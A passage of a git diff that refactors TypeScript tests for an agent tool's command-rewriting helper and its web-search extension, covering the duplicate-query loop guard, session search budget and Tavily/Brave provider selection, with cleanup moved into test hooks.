+  assert.equal(rewriteCommandWithRtk("npm run test", { binaryPath: "/tmp/rtk", spawnSyncImpl: askSpawn }), "rtk npm run test");
+});
+
+test("rewriteCommandWithRtk passes commands through on no-match or process error", () => {
+  const passthroughSpawn = ((_binary: string, _args: string[]) => ({ status: 1, stdout: "", error: undefined })) as typeof import("node:child_process").spawnSync;
+  assert.equal(rewriteCommandWithRtk("echo hello", { binaryPath: "/tmp/rtk", spawnSyncImpl: passthroughSpawn }), "echo hello");
+
+  const failingSpawn = ((_binary: string, _args: string[]) => ({ status: null, stdout: "", error: new Error("boom") })) as typeof import("node:child_process").spawnSync;
+  assert.equal(rewriteCommandWithRtk("git status", { binaryPath: "/tmp/rtk", spawnSyncImpl: failingSpawn }), "git status");
+});
+
+test("rewriteCommandWithRtk respects the disable flag", () => {
+  const spawnSyncImpl = (() => {
+    throw new Error("should not be called");
+  }) as unknown as typeof import("node:child_process").spawnSync;
+
+  assert.equal(
+    rewriteCommandWithRtk("git status", {
+      binaryPath: "/tmp/rtk",
+      spawnSyncImpl,
+      env: { [GSD_RTK_DISABLED_ENV]: "1" },
+    }),
+    "git status",
+  );
+});
+
+test("rewriteCommandWithRtk falls back to the managed RTK path when GSD_RTK_PATH is unset", () => {
+  const fake = createFakeRtk({ "git status": "rtk git status" });
+  const managedHome = mkdtempSync(join(tmpdir(), "gsd-rtk-managed-home-"));
+  const managedDir = join(managedHome, "agent", "bin");
+  const managedPath = join(managedDir, process.platform === "win32" ? "rtk.cmd" : "rtk");
+
+  mkdirSync(managedDir, { recursive: true });
+  copyFileSync(fake.path, managedPath);
+  if (process.platform !== "win32") {
+    chmodSync(managedPath, 0o755);
+  }
+
+  try {
+    const env = {
+      ...process.env,
+      GSD_HOME: managedHome,
+    };
+    delete env.GSD_RTK_PATH;
+
+    assert.equal(resolveRtkBinaryPath({ env }), managedPath);
+    assert.equal(rewriteCommandWithRtk("git status", { env }), "rtk git status");
+  } finally {
+    fake.cleanup();
+    rmSync(managedHome, { recursive: true, force: true });
+  }
+});
+
+test("validateRtkBinary checks the rewrite contract", () => {
+  const validSpawn = ((_binary: string, _args: string[]) => ({ status: 0, stdout: "rtk git status", error: undefined })) as typeof import("node:child_process").spawnSync;
+  assert.equal(validateRtkBinary("/tmp/rtk", { spawnSyncImpl: validSpawn }), true);
+
+  const invalidSpawn = ((_binary: string, _args: string[]) => ({ status: 0, stdout: "wrong output", error: undefined })) as typeof import("node:child_process").spawnSync;
+  assert.equal(validateRtkBinary("/tmp/rtk", { spawnSyncImpl: invalidSpawn }), false);
+});
+
+test("ensureRtkAvailable respects explicit disable and skip flags without downloading", async () => {
+  const disabled = await ensureRtkAvailable({
+    env: { [GSD_RTK_DISABLED_ENV]: "1" },
+  });
+  assert.equal(disabled.enabled, false);
+  assert.equal(disabled.source, "disabled");
+
+  const skipped = await ensureRtkAvailable({
+    env: {
+      [GSD_SKIP_RTK_INSTALL_ENV]: "1",
+      [GSD_RTK_PATH_ENV]: "/tmp/nonexistent-rtk",
+    },
+  });
+  assert.equal(skipped.available, false);
+  assert.equal(skipped.source, "missing");
+});
diff --git a/src/tests/search-loop-guard.test.ts b/src/tests/search-loop-guard.test.ts
index 266b5155a..c80ff4796 100644
--- a/src/tests/search-loop-guard.test.ts
+++ b/src/tests/search-loop-guard.test.ts
@@ -11,9 +11,26 @@
 
 import test from "node:test";
 import assert from "node:assert/strict";
-import { registerSearchTool } from "../resources/extensions/search-the-web/tool-search.ts";
+import { registerSearchTool, resetSearchLoopGuardState } from "../resources/extensions/search-the-web/tool-search.ts";
 import searchExtension from "../resources/extensions/search-the-web/index.ts";
 
+const ORIGINAL_ENV = {
+  BRAVE_API_KEY: process.env.BRAVE_API_KEY,
+  TAVILY_API_KEY: process.env.TAVILY_API_KEY,
+  OLLAMA_API_KEY: process.env.OLLAMA_API_KEY,
+};
+
+function restoreSearchEnv() {
+  if (ORIGINAL_ENV.BRAVE_API_KEY === undefined) delete process.env.BRAVE_API_KEY;
+  else process.env.BRAVE_API_KEY = ORIGINAL_ENV.BRAVE_API_KEY;
+
+  if (ORIGINAL_ENV.TAVILY_API_KEY === undefined) delete process.env.TAVILY_API_KEY;
+  else process.env.TAVILY_API_KEY = ORIGINAL_ENV.TAVILY_API_KEY;
+
+  if (ORIGINAL_ENV.OLLAMA_API_KEY === undefined) delete process.env.OLLAMA_API_KEY;
+  else process.env.OLLAMA_API_KEY = ORIGINAL_ENV.OLLAMA_API_KEY;
+}
+
 // =============================================================================
 // Mock helpers
 // =============================================================================
@@ -55,6 +72,8 @@ function createMockPI() {
   const toolsByName = new Map<string, any>();
   let registeredTool: any = null;
 
+  let activeTools: string[] = [];
+
   const pi = {
     on(event: string, handler: (...args: any[]) => unknown) {
       handlers.push({ event, handler });
@@ -74,6 +93,8 @@ function createMockPI() {
     getRegisteredTool(name = "search-the-web") {
       return toolsByName.get(name) ?? registeredTool;
     },
+    getActiveTools() { return activeTools; },
+    setActiveTools(tools: string[]) { activeTools = tools; },
     writeTempFile: async (_content: string, _opts?: unknown) => "/tmp/search-out.txt",
   };
 
@@ -99,146 +120,215 @@ async function callSearch(
  * state (lastSearchKey, consecutiveDupeCount) starts fresh here.
  */
 
-test("search loop guard fires after MAX_CONSECUTIVE_DUPES duplicates", async () => {
+test("search loop guard fires after MAX_CONSECUTIVE_DUPES duplicates", async (t) => {
   process.env.BRAVE_API_KEY = "test-key-loop-guard";
+  delete process.env.TAVILY_API_KEY;
+  delete process.env.OLLAMA_API_KEY;
   const restoreFetch = mockFetch(makeBraveResponse());
 
-  try {
-    const pi = createMockPI();
-    registerSearchTool(pi as any);
-    const tool = pi.getRegisteredTool();
-    assert.ok(tool, "search tool should be registered");
-
-    const execute = tool.execute.bind(tool);
-
-    // Calls 1–3: below threshold, should return search results (not an error)
-    for (let i = 1; i <= 3; i++) {
-      const result = await callSearch(execute, "loop test query", `call-${i}`);
-      assert.notEqual(result.isError, true, `call ${i} should not trigger loop guard`);
-    }
-
-    // Call 4: hits the threshold — guard fires
-    const result4 = await callSearch(execute, "loop test query", "call-4");
-    assert.equal(result4.isError, true, "call 4 should trigger the loop guard");
-    assert.equal(result4.details?.errorKind, "search_loop");
-    assert.ok(
-      result4.content[0].text.includes("Search loop detected"),
-      "error message should mention search loop"
-    );
-  } finally {
+  t.after(() => {
     restoreFetch();
-    delete process.env.BRAVE_API_KEY;
-  }
+    restoreSearchEnv();
+  });
+
+  const pi = createMockPI();
+  registerSearchTool(pi as any);
+  const tool = pi.getRegisteredTool();
+  assert.ok(tool, "search tool should be registered");
+
+  const execute = tool.execute.bind(tool);
+
+  // Call 1: first call should succeed (MAX_CONSECUTIVE_DUPES = 1)
+  const result1 = await callSearch(execute, "loop test query", "call-1");
+  assert.notEqual(result1.isError, true, "call 1 should not trigger loop guard");
+
+  // Call 2: identical query — guard fires immediately (threshold = 1)
+  const result2 = await callSearch(execute, "loop test query", "call-2");
+  assert.equal(result2.isError, true, "call 2 should trigger the loop guard");
+  assert.equal(result2.details?.errorKind, "search_loop");
+  assert.ok(
+    result2.content[0].text.includes("Search loop detected"),
+    "error message should mention search loop"
+  );
 });
 
-test("search loop guard resets at session_start boundary", async () => {
+test("search loop guard resets at session_start boundary", async (t) => {
   process.env.BRAVE_API_KEY = "test-key-loop-guard-session";
+  delete process.env.TAVILY_API_KEY;
+  delete process.env.OLLAMA_API_KEY;
   const restoreFetch = mockFetch(makeBraveResponse());
   const query = "session boundary query";
 
-  try {
-    const pi = createMockPI();
-    const mockCtx = {
-      hasUI: false,
-      ui: { notify() {} },
-    };
-    searchExtension(pi as any);
-    await pi.fire("session_start", {}, mockCtx);
-
-    const tool = pi.getRegisteredTool();
-    assert.ok(tool, "search tool should be registered");
-    const execute = tool.execute.bind(tool);
-
-    // Trigger guard in session 1
-    for (let i = 1; i <= 4; i++) {
-      await callSearch(execute, query, `s1-call-${i}`);
-    }
-    const guardResult = await callSearch(execute, query, "s1-call-5");
-    assert.equal(guardResult.isError, true, "session 1 should be guarded");
-    assert.equal(guardResult.details?.errorKind, "search_loop");
-
-    // New session should clear guard state
-    await pi.fire("session_start", {}, mockCtx);
-    const firstCallSession2 = await callSearch(execute, query, "s2-call-1");
-    assert.notEqual(
-      firstCallSession2.isError,
-      true,
-      "first identical query in a new session should not be blocked by prior session state",
-    );
-  } finally {
+  t.after(() => {
     restoreFetch();
-    delete process.env.BRAVE_API_KEY;
-  }
+    restoreSearchEnv();
+  });
+
+  const pi = createMockPI();
+  const mockCtx = {
+    hasUI: false,
+    ui: { notify() {} },
+  };
+  searchExtension(pi as any);
+  await pi.fire("session_start", {}, mockCtx);
+
+  const tool = pi.getRegisteredTool();
+  assert.ok(tool, "search tool should be registered");
+  const execute = tool.execute.bind(tool);
+
+  // Trigger guard in session 1 (call 1 succeeds, call 2 fires guard)
+  await callSearch(execute, query, "s1-call-1");
+  const guardResult = await callSearch(execute, query, "s1-call-2");
+  assert.equal(guardResult.isError, true, "session 1 should be guarded");
+  assert.equal(guardResult.details?.errorKind, "search_loop");
+
+  // New session should clear guard state
+  await pi.fire("session_start", {}, mockCtx);
+  const firstCallSession2 = await callSearch(execute, query, "s2-call-1");
+  assert.notEqual(
+    firstCallSession2.isError,
+    true,
+    "first identical query in a new session should not be blocked by prior session state",
+  );
 });
 
-test("search loop guard stays armed after firing — subsequent duplicates immediately re-trigger (#1671)", async () => {
+test("search loop guard stays armed after firing — subsequent duplicates immediately re-trigger (#1671)", async (t) => {
   process.env.BRAVE_API_KEY = "test-key-loop-guard-2";
+  delete process.env.TAVILY_API_KEY;
+  delete process.env.OLLAMA_API_KEY;
   const restoreFetch = mockFetch(makeBraveResponse());
 
   // Use a unique query so module-level state from previous test doesn't interfere
   const query = "persistent loop query";
 
-  try {
-    const pi = createMockPI();
-    registerSearchTool(pi as any);
-    const tool = pi.getRegisteredTool();
-    const execute = tool.execute.bind(tool);
-
-    // Exhaust the initial window (calls 1–3 succeed, call 4 fires guard)
-    for (let i = 1; i <= 3; i++) {
-      await callSearch(execute, query, `call-${i}`);
-    }
-    const guardFirst = await callSearch(execute, query, "call-4");
-    assert.equal(guardFirst.isError, true, "call 4 should trigger the loop guard");
-
-    // Key regression test: call 5 (and beyond) must ALSO trigger the guard.
-    // The original bug reset state on trigger, so call 5 was treated as a fresh
-    // first search and the loop restarted.
-    const guardSecond = await callSearch(execute, query, "call-5");
-    assert.equal(
-      guardSecond.isError, true,
-      "call 5 should STILL trigger the loop guard (guard must stay armed after firing)"
-    );
-    assert.equal(guardSecond.details?.errorKind, "search_loop");
-
-    // Call 6 as well — guard should keep firing
-    const guardThird = await callSearch(execute, query, "call-6");
-    assert.equal(
-      guardThird.isError, true,
-      "call 6 should STILL trigger the loop guard"
-    );
-  } finally {
+  t.after(() => {
     restoreFetch();
-    delete process.env.BRAVE_API_KEY;
-  }
+    restoreSearchEnv();
+  });
+
+  const pi = createMockPI();
+  registerSearchTool(pi as any);
+  const tool = pi.getRegisteredTool();
+  const execute = tool.execute.bind(tool);
+
+  // Call 1 succeeds, call 2 fires guard (MAX_CONSECUTIVE_DUPES = 1)
+  await callSearch(execute, query, "call-1");
+  const guardFirst = await callSearch(execute, query, "call-2");
+  assert.equal(guardFirst.isError, true, "call 2 should trigger the loop guard");
+
+  // Key regression test: call 3 (and beyond) must ALSO trigger the guard.
+  // The original bug reset state on trigger, so call 3 was treated as a fresh
+  // first search and the loop restarted.
+  const guardSecond = await callSearch(execute, query, "call-3");
+  assert.equal(
+    guardSecond.isError, true,
+    "call 3 should STILL trigger the loop guard (guard must stay armed after firing)"
+  );
+  assert.equal(guardSecond.details?.errorKind, "search_loop");
+
+  // Call 4 as well — guard should keep firing
+  const guardThird = await callSearch(execute, query, "call-4");
+  assert.equal(
+    guardThird.isError, true,
+    "call 4 should STILL trigger the loop guard"
+  );
 });
 
-test("search loop guard resets cleanly when a different query is issued", async () => {
+test("search loop guard resets cleanly when a different query is issued", async (t) => {
   process.env.BRAVE_API_KEY = "test-key-loop-guard-3";
+  delete process.env.TAVILY_API_KEY;
+  delete process.env.OLLAMA_API_KEY;
   const restoreFetch = mockFetch(makeBraveResponse());
 
   const queryA = "query alpha reset test";
   const queryB = "query beta reset test";
 
-  try {
-    const pi = createMockPI();
-    registerSearchTool(pi as any);
-    const tool = pi.getRegisteredTool();
-    const execute = tool.execute.bind(tool);
-
-    // Trigger guard for queryA
-    for (let i = 1; i <= 4; i++) {
-      await callSearch(execute, queryA, `call-a-${i}`);
-    }
-
-    // Issue a different query — should succeed (resets the duplicate counter)
-    const resultB = await callSearch(execute, queryB, "call-b-1");
-    assert.notEqual(
-      resultB.isError, true,
-      "a different query after guard should not be treated as a loop"
-    );
-  } finally {
+  t.after(() => {
     restoreFetch();
-    delete process.env.BRAVE_API_KEY;
-  }
+    restoreSearchEnv();
+  });
+
+  const pi = createMockPI();
+  registerSearchTool(pi as any);
+  const tool = pi.getRegisteredTool();
+  const execute = tool.execute.bind(tool);
+
+  // Trigger guard for queryA (call 1 succeeds, call 2 fires guard)
+  await callSearch(execute, queryA, "call-a-1");
+  await callSearch(execute, queryA, "call-a-2");
+
+  // Issue a different query — should succeed (resets the duplicate counter)
+  const resultB = await callSearch(execute, queryB, "call-b-1");
+  assert.notEqual(
+    resultB.isError, true,
+    "a different query after guard should not be treated as a loop"
+  );
+});
+
+test("session search budget blocks after MAX_SEARCHES_PER_SESSION varied queries", async (t) => {
+  process.env.BRAVE_API_KEY = "test-key-budget";
+  delete process.env.TAVILY_API_KEY;
+  delete process.env.OLLAMA_API_KEY;
+  const restoreFetch = mockFetch(makeBraveResponse());
+
+  t.after(() => {
+    restoreFetch();
+    restoreSearchEnv();
+  });
+
+  // Reset guard state (including session budget) and register directly
+  resetSearchLoopGuardState();
+  const pi = createMockPI();
+  registerSearchTool(pi as any);
+
+  const tool = pi.getRegisteredTool();
+  assert.ok(tool, "search tool should be registered");
+  const execute = tool.execute.bind(tool);
+
+  // Issue 15 unique queries — all should succeed (budget = 15)
+  for (let i = 1; i <= 15; i++) {
+    const result = await callSearch(execute, `unique budget query ${i}`, `budget-${i}`);
+    assert.notEqual(result.isError, true, `query ${i} should succeed within budget`);
+  }
+
+  // Query 16: budget exhausted — should be blocked
+  const blocked = await callSearch(execute, "one more query", "budget-16");
+  assert.equal(blocked.isError, true, "query 16 should be blocked by budget");
+  assert.equal(blocked.details?.errorKind, "budget_exhausted");
+  assert.ok(
+    blocked.content[0].text.includes("Search budget exhausted"),
+    "error message should mention budget"
+  );
+});
+
+test("session search budget resets via resetSearchLoopGuardState", async (t) => {
+  process.env.BRAVE_API_KEY = "test-key-budget-reset";
+  delete process.env.TAVILY_API_KEY;
+  delete process.env.OLLAMA_API_KEY;
+  const restoreFetch = mockFetch(makeBraveResponse());
+
+  t.after(() => {
+    restoreFetch();
+    restoreSearchEnv();
+  });
+
+  // Reset and register directly
+  resetSearchLoopGuardState();
+  const pi = createMockPI();
+  registerSearchTool(pi as any);
+
+  const tool = pi.getRegisteredTool();
+  const execute = tool.execute.bind(tool);
+
+  // Exhaust budget
+  for (let i = 1; i <= 15; i++) {
+    await callSearch(execute, `budget reset query ${i}`, `br-${i}`);
+  }
+  const exhausted = await callSearch(execute, "exhausted query", "br-exhausted");
+  assert.equal(exhausted.isError, true, "budget should be exhausted");
+
+  // Reset simulates new session
+  resetSearchLoopGuardState();
+  const fresh = await callSearch(execute, "fresh session query", "br-fresh");
+  assert.notEqual(fresh.isError, true, "first query after reset should succeed");
 });
diff --git a/src/tests/search-provider-command.test.ts b/src/tests/search-provider-command.test.ts
index 9540a5c02..0df49f87c 100644
--- a/src/tests/search-provider-command.test.ts
+++ b/src/tests/search-provider-command.test.ts
@@ -118,79 +118,73 @@ async function loadCommand(): Promise<CapturedCommand> {
 // 1. Direct arg — tavily
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('direct arg "tavily" sets preference and notifies', async () => {
+test('direct arg "tavily" sets preference and notifies', async (t) => {
   const { setSearchProviderPreference, getSearchProviderPreference } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const cmd = await loadCommand()
   const { authPath, cleanup } = makeTmpAuth()
 
-  try {
-    await withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: undefined }, async () => {
-      // Pre-set to auto so we can verify the change
-      setSearchProviderPreference('auto', authPath)
+  t.after(() => { cleanup() });
 
-      const ctx = makeMockCtx()
-      await cmd.handler('tavily', ctx)
+  await withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: undefined }, async () => {
+    // Pre-set to auto so we can verify the change
+    setSearchProviderPreference('auto', authPath)
 
-      // No select UI shown
-      assert.equal(ctx.ui.selectCalls.length, 0, 'should not show select UI for direct arg')
+    const ctx = makeMockCtx()
+    await cmd.handler('tavily', ctx)
 
-      // Notification sent
-      assert.equal(ctx.ui.notifyCalls.length, 1, 'should notify once')
-      assert.match(ctx.ui.notifyCalls[0].message, /Search provider set to tavily/, 'notification should confirm provider set')
-      assert.match(ctx.ui.notifyCalls[0].message, /Effective provider: tavily/, 'notification should show effective provider')
-    })
-  } finally {
-    cleanup()
-  }
+    // No select UI shown
+    assert.equal(ctx.ui.selectCalls.length, 0, 'should not show select UI for direct arg')
+
+    // Notification sent
+    assert.equal(ctx.ui.notifyCalls.length, 1, 'should notify once')
+    assert.match(ctx.ui.notifyCalls[0].message, /Search provider set to tavily/, 'notification should confirm provider set')
+    assert.match(ctx.ui.notifyCalls[0].message, /Effective provider: tavily/, 'notification should show effective provider')
+  })
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 2. Direct arg — brave
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('direct arg "brave" sets preference and notifies', async () => {
+test('direct arg "brave" sets preference and notifies', async (t) => {
   const cmd = await loadCommand()
   const { authPath, cleanup } = makeTmpAuth()
 
-  try {
-    await withEnv({ TAVILY_API_KEY: undefined, BRAVE_API_KEY: 'BSA-test' }, async () => {
-      const ctx = makeMockCtx()
-      await cmd.handler('brave', ctx)
+  t.after(() => { cleanup() });
 
-      assert.equal(ctx.ui.selectCalls.length, 0)
-      assert.equal(ctx.ui.notifyCalls.length, 1)
-      assert.match(ctx.ui.notifyCalls[0].message, /Search provider set to brave/)
-      assert.match(ctx.ui.notifyCalls[0].message, /Effective provider: brave/)
-    })
-  } finally {
-    cleanup()
-  }
+  await withEnv({ TAVILY_API_KEY: undefined, BRAVE_API_KEY: 'BSA-test' }, async () => {
+    const ctx = makeMockCtx()
+    await cmd.handler('brave', ctx)
+
+    assert.equal(ctx.ui.selectCalls.length, 0)
+    assert.equal(ctx.ui.notifyCalls.length, 1)
+    assert.match(ctx.ui.notifyCalls[0].message, /Search provider set to brave/)
+    assert.match(ctx.ui.notifyCalls[0].message, /Effective provider: brave/)
+  })
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // 3. Direct arg — auto
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('direct arg "auto" sets preference and notifies', async () => {
+test('direct arg "auto" sets preference and notifies', async (t) => {
   const cmd = await loadCommand()
   const { authPath, cleanup } = makeTmpAuth()
 
-  try {
-    await withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: 'BSA-test' }, async () => {
-      const ctx = makeMockCtx()
-      await cmd.handler('auto', ctx)
+  t.after(() => { cleanup() });
 
-      assert.equal(ctx.ui.selectCalls.length, 0)
-      assert.equal(ctx.ui.notifyCalls.length, 1)
-      assert.match(ctx.ui.notifyCalls[0].message, /Search provider set to auto/)
-      // auto with both keys → tavily
-      assert.match(ctx.ui.notifyCalls[0].message, /Effective provider: tavily/)
-    })
-  } finally {
-    cleanup()
-  }
+  await withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: 'BSA-test' }, async () => {
+    const ctx = makeMockCtx()
+    await cmd.handler('auto', ctx)
+
+    assert.equal(ctx.ui.selectCalls.length, 0)
+    assert.equal(ctx.ui.notifyCalls.length, 1)
+    assert.match(ctx.ui.notifyCalls[0].message, /Search provider set to auto/)
+    // auto with both keys → tavily
+    assert.match(ctx.ui.notifyCalls[0].message, /Effective provider: tavily/)
+  })
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -227,29 +221,27 @@ test('no arg shows select UI with 3 options, user picks brave', async () => {
 // 5. Cancel (select returns undefined) — no side effects
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('cancel (select returns undefined) produces no side effects', async () => {
+test('cancel (select returns undefined) produces no side effects', async (t) => {
   const { getSearchProviderPreference, setSearchProviderPreference } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const cmd = await loadCommand()
   const { authPath, cleanup } = makeTmpAuth()
 
-  try {
-    await withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: undefined }, async () => {
-      setSearchProviderPreference('tavily', authPath)
+  t.after(() => { cleanup() });
 
-      // selectReturn = undefined simulates Esc
-      const ctx = makeMockCtx(undefined)
-      await cmd.handler('', ctx)
+  await withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: undefined }, async () => {
+    setSearchProviderPreference('tavily', authPath)
 
-      // Select was called
-      assert.equal(ctx.ui.selectCalls.length, 1)
-      // No notification (no side effects)
-      assert.equal(ctx.ui.notifyCalls.length, 0, 'cancel should produce no notification')
-    })
-  } finally {
-    cleanup()
-  }
+    // selectReturn = undefined simulates Esc
+    const ctx = makeMockCtx(undefined)
+    await cmd.handler('', ctx)
+
+    // Select was called
+    assert.equal(ctx.ui.selectCalls.length, 1)
+    // No notification (no side effects)
+    assert.equal(ctx.ui.notifyCalls.length, 0, 'cancel should produce no notification')
+  })
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
diff --git a/src/tests/search-tavily.test.ts b/src/tests/search-tavily.test.ts
index 456abb7a4..3365d3550 100644
--- a/src/tests/search-tavily.test.ts
+++ b/src/tests/search-tavily.test.ts
@@ -83,120 +83,120 @@ function mockFetch(responseBody: unknown, status = 200) {
 // Test: executeTavilySearch produces correct CachedSearchResult shape
 // =============================================================================
 
-test("executeTavilySearch sends POST to Tavily API and produces CachedSearchResult", async () => {
+test("executeTavilySearch sends POST to Tavily API and produces CachedSearchResult", async (t) => {
   // Set TAVILY_API_KEY for this test
   const origKey = process.env.TAVILY_API_KEY;
   process.env.TAVILY_API_KEY = "tvly-test-key-12345";
 
   const { captured, restore } = mockFetch(makeTavilyResponse());
 
-  try {
-    // Dynamic import to get the module-level function
-    // We need to call it through the module — but executeTavilySearch is not exported.
-    // Instead, we test through the tool's execute path by importing the module fresh.
-    // Since executeTavilySearch is a private function, we test it indirectly through
-    // the request captured by our mock fetch.
-
-    // Import the normalization helpers to verify the mapping
-    const { normalizeTavilyResult } = await import("../resources/extensions/search-the-web/tavily.ts");
-
-    // Simulate what executeTavilySearch does: build request, call fetch, map response
-    const requestBody: Record<string, unknown> = {
-      query: "test query",
-      max_results: 10,
-      search_depth: "basic",
-    };
-
-    const response = await globalThis.fetch("https://api.tavily.com/search", {
-      method: "POST",
-      headers: {
-        "Content-Type": "application/json",
-        "Authorization": "Bearer tvly-test-key-12345",
-      },
-      body: JSON.stringify(requestBody),
-    });
-
-    const data = await response.json() as { results: Array<{ title: string; url: string; content: string; score: number; published_date?: string }> };
-
-    // Verify request shape
-    assert.equal(captured.url, "https://api.tavily.com/search", "request URL");
-    assert.equal(captured.method, "POST", "HTTP method");
-    assert.equal(captured.headers?.["Content-Type"], "application/json", "Content-Type header");
-    assert.equal(captured.headers?.["Authorization"], "Bearer tvly-test-key-12345", "Authorization header");
-    assert.deepEqual(captured.body, requestBody, "request body");
-
-    // Verify response mapping
-    const mapped = data.results.map(normalizeTavilyResult);
-    assert.equal(mapped.length, 2);
-    assert.equal(mapped[0].title, "First Result");
-    assert.equal(mapped[0].url, "https://example.com/first");
-    assert.equal(mapped[0].description, "Description of first result.");
-    assert.ok(mapped[0].age, "Published date should produce an age string");
-    assert.equal(mapped[1].title, "Second Result");
-    assert.equal(mapped[1].age, undefined, "No published_date → no age");
-  } finally {
+  t.after(() => {
     restore();
     if (origKey !== undefined) process.env.TAVILY_API_KEY = origKey;
     else delete process.env.TAVILY_API_KEY;
-  }
+  });
+
+  // Dynamic import to get the module-level function
+  // We need to call it through the module — but executeTavilySearch is not exported.
+  // Instead, we test through the tool's execute path by importing the module fresh.
+  // Since executeTavilySearch is a private function, we test it indirectly through
+  // the request captured by our mock fetch.
+
+  // Import the normalization helpers to verify the mapping
+  const { normalizeTavilyResult } = await import("../resources/extensions/search-the-web/tavily.ts");
+
+  // Simulate what executeTavilySearch does: build request, call fetch, map response
+  const requestBody: Record<string, unknown> = {
+    query: "test query",
+    max_results: 10,
+    search_depth: "basic",
+  };
+
+  const response = await globalThis.fetch("https://api.tavily.com/search", {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json",
+      "Authorization": "Bearer tvly-test-key-12345",
+    },
+    body: JSON.stringify(requestBody),
+  });
+
+  const data = await response.json() as { results: Array<{ title: string; url: string; content: string; score: number; published_date?: string }> };
+
+  // Verify request shape
+  assert.equal(captured.url, "https://api.tavily.com/search", "request URL");
+  assert.equal(captured.method, "POST", "HTTP method");
+  assert.equal(captured.headers?.["Content-Type"], "application/json", "Content-Type header");
+  assert.equal(captured.headers?.["Authorization"], "Bearer tvly-test-key-12345", "Authorization header");
+  assert.deepEqual(captured.body, requestBody, "request body");
+
+  // Verify response mapping
+  const mapped = data.results.map(normalizeTavilyResult);
+  assert.equal(mapped.length, 2);
+  assert.equal(mapped[0].title, "First Result");
+  assert.equal(mapped[0].url, "https://example.com/first");
+  assert.equal(mapped[0].description, "Description of first result.");
+  assert.ok(mapped[0].age, "Published date should produce an age string");
+  assert.equal(mapped[1].title, "Second Result");
+  assert.equal(mapped[1].age, undefined, "No published_date → no age");
 });
 
 // =============================================================================
 // Test: Provider branching — resolveSearchProvider returns correct provider
 // =============================================================================
 
-test("resolveSearchProvider returns 'tavily' when TAVILY_API_KEY is set and BRAVE_API_KEY is not", () => {
+test("resolveSearchProvider returns 'tavily' when TAVILY_API_KEY is set and BRAVE_API_KEY is not", (t) => {
   const origTavily = process.env.TAVILY_API_KEY;
   const origBrave = process.env.BRAVE_API_KEY;
 
   process.env.TAVILY_API_KEY = "tvly-test-key";
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const provider = resolveSearchProvider();
-    assert.equal(provider, "tavily");
-  } finally {
+  t.after(() => {
     if (origTavily !== undefined) process.env.TAVILY_API_KEY = origTavily;
     else delete process.env.TAVILY_API_KEY;
     if (origBrave !== undefined) process.env.BRAVE_API_KEY = origBrave;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+
+  const provider = resolveSearchProvider();
+  assert.equal(provider, "tavily");
 });
 
-test("resolveSearchProvider returns 'brave' when only BRAVE_API_KEY is set", () => {
+test("resolveSearchProvider returns 'brave' when only BRAVE_API_KEY is set", (t) => {
   const origTavily = process.env.TAVILY_API_KEY;
   const origBrave = process.env.BRAVE_API_KEY;
 
   delete process.env.TAVILY_API_KEY;
   process.env.BRAVE_API_KEY = "BSA-test-key";
 
-  try {
-    const provider = resolveSearchProvider();
-    assert.equal(provider, "brave");
-  } finally {
+  t.after(() => {
     if (origTavily !== undefined) process.env.TAVILY_API_KEY = origTavily;
     else delete process.env.TAVILY_API_KEY;
     if (origBrave !== undefined) process.env.BRAVE_API_KEY = origBrave;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+
+  const provider = resolveSearchProvider();
+  assert.equal(provider, "brave");
 });
 
-test("resolveSearchProvider returns null when neither key is set", () => {
+test("resolveSearchProvider returns null when neither key is set", (t) => {
   const origTavily = process.env.TAVILY_API_KEY;
   const origBrave = process.env.BRAVE_API_KEY;
 
   delete process.env.TAVILY_API_KEY;
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const provider = resolveSearchProvider();
-    assert.equal(provider, null);
-  } finally {
+  t.after(() => {
     if (origTavily !== undefined) process.env.TAVILY_API_KEY = origTavily;
     else delete process.env.BRAVE_API_KEY;
     if (origBrave !== undefined) process.env.BRAVE_API_KEY = origBrave;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+
+  const provider = resolveSearchProvider();
+  assert.equal(provider, null);
 });
 
 // =============================================================================
@@ -245,7 +245,7 @@ test("no-key error message contains both TAVILY_API_KEY and BRAVE_API_KEY", () =
 // Test: Tavily answer mapping — answer field flows through as summary text
 // =============================================================================
 
-test("Tavily answer field maps to summaryText in CachedSearchResult", async () => {
+test("Tavily answer field maps to summaryText in CachedSearchResult", async (t) => {
   const origKey = process.env.TAVILY_API_KEY;
   process.env.TAVILY_API_KEY = "tvly-test-key";
 
@@ -255,29 +255,29 @@ test("Tavily answer field maps to summaryText in CachedSearchResult", async () =
 
   const { captured, restore } = mockFetch(responseWithAnswer);
 
-  try {
-    const response = await globalThis.fetch("https://api.tavily.com/search", {
-      method: "POST",
-      headers: { "Content-Type": "application/json", "Authorization": "Bearer tvly-test-key" },
-      body: JSON.stringify({ query: "what is typescript", max_results: 10, search_depth: "basic", include_answer: true }),
-    });
-
-    const data = await response.json() as { answer?: string };
-
-    // Verify the answer is present
-    assert.equal(data.answer, "TypeScript is a typed superset of JavaScript that compiles to plain JavaScript.");
-
-    // Verify the request included include_answer
-    assert.equal(captured.body?.include_answer, true);
-
-    // The answer should flow to summaryText (not summarizerKey)
-    const summaryText = data.answer || undefined;
-    assert.ok(summaryText, "Answer should be truthy and used as summaryText");
-  } finally {
+  t.after(() => {
     restore();
     if (origKey !== undefined) process.env.TAVILY_API_KEY = origKey;
     else delete process.env.TAVILY_API_KEY;
-  }
+  });
+
+  const response = await globalThis.fetch("https://api.tavily.com/search", {
